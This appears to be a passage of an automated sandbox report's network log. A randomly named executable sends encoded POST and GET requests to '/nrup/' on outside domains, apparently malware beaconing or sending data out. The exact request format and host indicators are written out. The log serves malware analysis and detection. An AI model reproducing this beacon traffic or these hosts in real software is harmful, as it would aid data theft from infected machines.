zXeqxVV5bs/mMrime3tJNJcQpE191WhRKc0EcXOSkcS9diZ+qhfFijBjy9pcnqSpyUBqvmRabPX45Dw4j6cpJQuTgq0X6iOa7GZgB6RfQcoTCSwWK/ookDl9tXGqkzE8zmYpSoGzIKlUi2L1iv+LZxNiofBEmSv4IA7RUWBe5MB8Hl1iB8zz2c+Syzin4EO1BByuSMqIKlbRXDyrKhRL590i1EOwVl4s4MEKnVMrNeD4BYuapCmErVQdbqgTwka4j99vvyDkDOSwXGpE5YOqN/KqjdAEoptBg6PkQZsp2JSsNnNBi6xuTpEVtf1mwQk65N1Q/KJPvCWVpmP77OEzEuiaWAxFWJzMpXKRYGOCOANvZjFg [TRUNCATED]
May 3, 2024 11:34:39.899488926 CEST	125	OUT	Data Raw: 39 62 63 66 73 67 52 41 61 6c 65 36 50 56 68 35 59 36 37 41 6c 32 66 54 38 31 61 43 39 49 56 31 53 74 78 2f 39 59 74 58 62 35 31 2b 53 4f 78 51 63 43 75 79 62 54 2f 61 38 42 79 52 39 54 67 4b 58 68 6d 4a 63 6b 51 71 73 56 52 67 41 47 37 52 48 53 Data Ascii: 9bcfsgRAale6PVh5Y67Al2fT81aC9IV1Stx/9YtXb51+SOxQcCuybT/a8ByR9TgKXhmJckQqsVRgAG7RHSQc+dFSqENjgE6IOKtmCCezN1xAe7ymkeKxok0ZLujsT
May 3, 2024 11:34:39.899521112 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 03 May 2024 09:34:39 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 3, 2024 11:34:39.899559975 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 3, 2024 11:34:40.072758913 CEST	1245	IN	Data Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49195	162.240.81.18	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:42.420484066 CEST	742	OUT	POST /nrup/ HTTP/1.1 Host: www.agoraeubebo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.agoraeubebo.com Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.agoraeubebo.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 51 55 44 6a 32 34 42 73 59 4f 47 76 7a 4a 51 6d 32 39 4e 45 30 5a 5a 39 61 4a 48 56 51 64 67 38 78 59 6d 39 65 59 41 4c 55 5a 58 31 4b 33 48 2b 52 39 4b 42 65 42 72 42 6d 70 76 46 2b 64 6e 77 4e 37 65 31 36 46 68 41 69 67 77 34 73 6b 51 48 4a 71 53 33 73 34 78 33 33 52 7a 6a 31 57 57 45 6f 79 6b 4c 55 70 75 32 4b 73 33 6e 44 57 50 54 58 69 66 4b 58 66 62 51 4a 79 65 58 6d 46 53 4f 65 72 43 74 4c 78 66 45 7a 68 46 38 4b 6f 47 64 31 71 66 52 4e 6d 63 54 63 73 34 47 30 50 4e 4c 34 61 38 62 42 33 62 77 4f 35 71 37 53 45 46 36 44 53 62 74 78 57 36 44 65 2b 43 42 66 53 56 61 74 51 3d 3d Data Ascii: pX6dR=QUDj24BsYOGvzJQm29NE0ZZ9aJHVQdg8xYm9eYALUZX1K3H+R9KBeBrBmpvF+dnwN7e16FhAigw4skQHJqS3s4x33Rzj1WWEoykLUpu2Ks3nDWPTXifKXfbQJyeXmFSOerCtLxfEzhF8KoGd1qfRNmcTcs4G0PNL4a8bB3bwO5q7SEF6DSbtxW6De+CBfSVatQ==
May 3, 2024 11:34:42.593981028 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 03 May 2024 09:34:42 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 3, 2024 11:34:42.594063997 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 3, 2024 11:34:42.594105005 CEST	1245	IN	Data Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49196	162.240.81.18	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:45.118235111 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.agoraeubebo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.agoraeubebo.com Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.agoraeubebo.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 51 55 44 6a 32 34 42 73 59 4f 47 76 31 6f 41 6d 31 61 35 45 78 35 5a 38 56 70 48 56 65 39 68 31 78 5a 61 39 65 61 73 6c 56 72 37 31 4b 67 6a 2b 52 65 69 42 59 42 72 42 7a 35 76 2f 6a 74 6e 63 4e 37 61 35 36 48 6f 39 69 6a 63 34 73 44 55 48 4e 5a 32 77 6e 6f 78 70 7a 52 7a 67 31 57 58 63 6f 32 41 50 55 70 62 64 4b 73 66 6e 44 6c 6e 54 52 53 66 4a 62 2f 62 51 4a 79 66 59 6d 46 53 6d 65 76 6d 6c 4c 31 62 55 30 54 74 38 4b 4e 79 64 30 4e 6a 65 47 47 63 58 66 73 35 6e 38 4e 6f 34 39 36 6f 67 4a 6b 61 57 47 4c 53 55 58 79 52 41 45 79 6a 52 37 56 33 71 65 65 58 4d 63 51 34 2f 31 56 33 2b 70 4e 57 37 47 77 48 59 47 44 4b 54 76 32 30 36 4a 72 57 70 32 72 54 47 77 70 5a 53 67 4e 52 46 41 6d 7a 55 52 54 6c 37 31 6d 39 4b 6f 71 33 49 79 57 36 35 6f 49 6c 68 39 6b 59 70 78 76 58 37 31 76 52 79 77 34 74 64 50 43 2b 79 56 68 42 2f 57 7a 39 43 46 36 71 34 4a 52 59 42 6c 51 4b 5a 69 65 46 35 33 69 69 5a 6e 5a 6d 68 49 72 39 39 6e 41 4f 6e 79 30 75 4a 48 71 35 34 35 59 66 34 66 5a 34 51 52 6f 34 44 [TRUNCATED] Data Ascii: pX6dR=QUDj24BsYOGv1oAm1a5Ex5Z8VpHVe9h1xZa9easlVr71Kgj+ReiBYBrBz5v/jtncN7a56Ho9ijc4sDUHNZ2wnoxpzRzg1WXco2APUpbdKsfnDlnTRSfJb/bQJyfYmFSmevmlL1bU0Tt8KNyd0NjeGGcXfs5n8No496ogJkaWGLSUXyRAEyjR7V3qeeXMcQ4/1V3+pNW7GwHYGDKTv206JrWp2rTGwpZSgNRFAmzURTl71m9Koq3IyW65oIlh9kYpxvX71vRyw4tdPC+yVhB/Wz9CF6q4JRYBlQKZieF53iiZnZmhIr99nAOny0uJHq545Yf4fZ4QRo4Dk6/A4dl8q7UXZbsO+o6F1DNZnFQxYtKECnN4IN5lm/KTfDYzDMYKeMrWe/Od29oacMS0UKSgQvbTJ4VgpU68wuTkGXtJaDwn4UHf/mcJnJHceHVEo8lXexL8EPTSyCpSSxmM19Nan7lUkONZ0r8207y7WG8Uh1ymlb2eV9vNvI6/iXMIvr/33D4DwRhbx1dt2Uox8qwUPSFfSlXKazCLDiy+m1wKFXSQkLrCtQCbVSbHxOxpg7LwVUUl2YXnqSR3ybSu5faTrsxqf82s9Nb6fkAnZJul4bVvDeptUlllx0SgPtj7LGzPeqoqV52O/nEriXO35ZMfHgpDz91VrxLb0HkXOTYcS8liZNChIGKjZDyz0MngYJ/DBq+fRf7lX69Dxpj6ZrwGwTggkH6SKa7uZgB2ReJBojiSwD+/pJkAmdtQTallbszaYvySGxUalHG2L0Sv+ZxxNyofBEmVv4IE7RIsBfIbB8HlzzB8zBuc2yyM6X5AElAayuXlqISLbRrDjpyhRL5y6y1LHQV64s07EKmfMrBeCJlY8f9CmgLVHNbqhTwjUYj+9vu3DhzeSxXGr0ZYNp1gF6jcX0oFkhlkPkdEstuJSfJnX0e6xeTpG1tchWwB5q1R1QjwJO/0Vk5mPKrOXAcvpKW71FWLzMUrKXAOOD2+NoVjEA [TRUNCATED]
May 3, 2024 11:34:45.292635918 CEST	1589	OUT	Data Raw: 39 66 65 33 76 33 68 41 41 69 65 36 43 56 68 34 48 36 37 34 70 32 62 44 73 31 65 4f 39 49 58 74 53 2f 78 2f 69 51 39 58 5a 2b 31 2b 49 4f 78 63 78 43 75 71 78 54 37 47 38 42 7a 39 39 53 41 36 58 6d 6d 4a 63 70 77 71 31 4a 68 67 64 43 2b 4a 41 53 Data Ascii: 9fe3v3hAAie6CVh4H674p2bDs1eO9IXtS/x/iQ9XZ+1+IOxcxCuqxT7G8Bz99SA6XmmJcpwq1JhgdC+JASQEkLAOsMdDwDIohOP6NL/Hw4AkA0TuDbc1S5DgZ+W1U8A+VfH5hrf2MkHV7iTnNGrsNrZSfHB0LSw4q+xzOtHpvUJX5WUCRijXIZbk97P4mws5jnhOF5XvpqDqqwUssE/QRymUnAlWxZ/jiNnw6Jm7kFZpakxzrc3
May 3, 2024 11:34:45.292678118 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 03 May 2024 09:34:45 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 3, 2024 11:34:45.292709112 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 3, 2024 11:34:45.466506958 CEST	1245	IN	Data Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49197	162.240.81.18	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:47.919375896 CEST	474	OUT	GET /nrup/?pX6dR=dWrD1PFadq7V5KkT4K5o1ooaeKyTUtdu4bG3e9Abb7XIEj/TR5WiVjbbrLaqi43PNcTkySoUuB0roTUDMpHLiI93yD7r6mO3qGIKC7GmJs3jJHvYZTDYbK7MHXTd&tv=6TdD8B HTTP/1.1 Host: www.agoraeubebo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:34:48.092771053 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 03 May 2024 09:34:48 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 3, 2024 11:34:48.092854977 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
May 3, 2024 11:34:48.092936993 CEST	1245	IN	Data Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49198	91.195.240.94	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:59.557101011 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.5597043.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.5597043.com Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5597043.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 37 59 46 56 66 41 45 39 67 39 76 44 70 56 55 35 52 4e 70 58 44 4c 4b 6d 4a 44 72 72 46 30 2f 54 52 42 4f 4c 32 77 69 7a 4d 34 4b 5a 4d 44 32 6b 6e 77 44 56 62 4f 54 50 55 36 53 38 4d 52 53 50 47 48 4f 34 6c 5a 36 75 77 71 53 34 36 36 4d 42 39 76 5a 39 6c 53 64 58 57 73 78 43 2b 4f 6d 77 48 4f 49 42 71 63 4d 64 4f 6f 67 35 49 64 6d 71 52 45 44 66 53 79 59 2f 32 74 43 6b 32 69 61 52 70 58 7a 70 33 66 33 78 54 7a 4a 7a 6d 4b 36 61 46 48 58 50 6c 4e 42 58 53 4a 58 58 78 57 43 46 76 50 42 70 58 73 51 4d 71 5a 4b 44 6a 52 2f 2b 6b 72 5a 4e 78 49 57 67 47 6a 6b 78 77 72 58 57 73 49 54 2b 75 32 66 56 53 7a 6d 56 48 6f 49 4c 57 62 4f 53 68 59 67 6b 75 45 57 44 37 4e 32 34 57 71 35 66 6c 30 54 4e 78 56 65 66 41 55 67 4d 30 4c 62 4b 78 2b 50 78 6c 4d 77 49 47 30 2b 72 47 48 66 39 75 76 4b 4d 2f 44 7a 4d 48 6a 48 2b 44 67 78 48 6c 74 70 69 66 50 69 42 4d 51 61 6c 68 53 50 69 65 70 59 57 31 2f 2b 63 6b 6c 56 71 59 30 37 6c 35 78 62 6e 4f 74 56 75 58 42 68 77 74 52 51 57 6c 36 6a 36 32 63 53 44 [TRUNCATED] Data Ascii: pX6dR=7YFVfAE9g9vDpVU5RNpXDLKmJDrrF0/TRBOL2wizM4KZMD2knwDVbOTPU6S8MRSPGHO4lZ6uwqS466MB9vZ9lSdXWsxC+OmwHOIBqcMdOog5IdmqREDfSyY/2tCk2iaRpXzp3f3xTzJzmK6aFHXPlNBXSJXXxWCFvPBpXsQMqZKDjR/+krZNxIWgGjkxwrXWsIT+u2fVSzmVHoILWbOShYgkuEWD7N24Wq5fl0TNxVefAUgM0LbKx+PxlMwIG0+rGHf9uvKM/DzMHjH+DgxHltpifPiBMQalhSPiepYW1/+cklVqY07l5xbnOtVuXBhwtRQWl6j62cSDLBy/seNEI/n5IHMNPzGno9SzOB1Wrodl9XvVxUzZ9fErbPRBHQ/59wgvGlVwalNpEUawQ8A0h6PW0l4E5TdQd1qRQED+/5RNmCEI8eEDbMonOfBrSQzGXqGRHBMEE785fQqOTH+C3BnEn6itFrLps2bG4sgFDY5mNzZEw4GdgPzrCUeprSnXyfyTZYM1dwq7homc+G3+YRerKQeyPqCkpQMNy8UOYpICsaUXbUrYre5uIBipBERGeRI2tSBNS9pirp/MjWAMBEH1x53GAt07hnx755oZ8pOulSN8o4x2gGkuu8sZqXvmpzLJVeU5QcZfR2kdbAk5Os84fbVSABeQYAKPuHuG82Gba9FH7U9pbBr22a/Q/eGGsJblTIq4xKMAs7qQiCaR+3cOQVq7RfRRUE58Aa+Wt6KYbxf0WSWN0asajZY47aORlN8qP6oIZcSbvF6kUNj62Ck255eIDA/gUDHve4vip3Qddf4Qp6itZKxSvgVWhI7cNbHBzIdGnyT5tFkwTJqnkT+MM0Ls9dPbrL91NrEvNxV+d6imcm6RSs25a5KJ3jfoCOtiRFbnS4zG0eDm1U0ilONA8J3cqsjEO7ARBEzsBqFl34R0qsaA0d7X3n8/wDfAl4v4wdjDtsUKy5tG9SCLYnDXjRCRhOgfs0KarGmzbZIjIj [TRUNCATED]
May 3, 2024 11:34:59.732667923 CEST	113	OUT	Data Raw: 69 47 5a 4f 43 61 6f 71 53 4f 48 76 55 74 68 62 6f 73 67 71 39 6e 46 39 53 76 34 6e 42 39 36 55 37 74 57 31 6d 65 39 45 57 6a 4c 4c 34 78 78 4b 36 4c 73 4f 77 4d 59 30 58 34 69 71 37 71 6c 39 64 36 74 43 50 53 6f 79 44 42 4d 5a 42 51 6e 4a 4c 59 Data Ascii: iGZOCaoqSOHvUthbosgq9nF9Sv4nB96U7tW1me9EWjLL4xxK6LsOwMY0X4iq7ql9d6tCPSoyDBMZBQnJLYf/L32HUPCkjdaWh2KY+0BytN5jsBxcx
